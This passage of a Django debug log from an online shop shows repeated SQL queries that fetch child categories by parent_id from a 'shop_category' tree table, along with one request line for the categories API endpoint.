"shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:56:23,724 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:56:23,727 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:56:23,731 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:56:23,737 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:56:23,741 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:56:23,744 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:56:23,748 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:56:23,752 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:56:23,755 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:56:23,761 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:56:23,764 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:56:23,768 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:56:23,771 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:56:23,775 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:56:23,781 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:56:23,784 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:56:23,788 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:56:23,791 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:56:23,795 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:56:23,801 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:56:23,804 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:56:23,808 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:56:23,812 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:56:23,815 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:56:23,819 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:56:23,823 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:56:23,827 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:56:23,830 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:56:23,835 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:56:23,838 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:56:23] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:56:24,313 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:56:24,323 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:56:24,329 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:56:24,333 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:56:24,338 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:56:24,343 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:56:24,347 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:56:24,351 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:56:24,355 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:56:24,361 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:56:24,365 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:56:24,370 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:56:24,374 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:56:24,378 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:56:24,384 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:56:24,387 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:56:24,391 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:56:24,395 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:56:24,399 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:56:24,405 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:56:24,410 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:56:24,419 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:56:24,423 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:56:24,427 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:56:24,431 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:56:24,436 utils 4252 140031503103744 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:56:24,442 utils 4252 140031732287232 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:56:24,449 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:56:24,454 utils 4252 140031732287232 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:56:24,458 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:56:24,462 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:56:24,465 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:56:24,469 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:56:24,471 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:56:24,473 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:56:24,476 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:56:24,478 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE 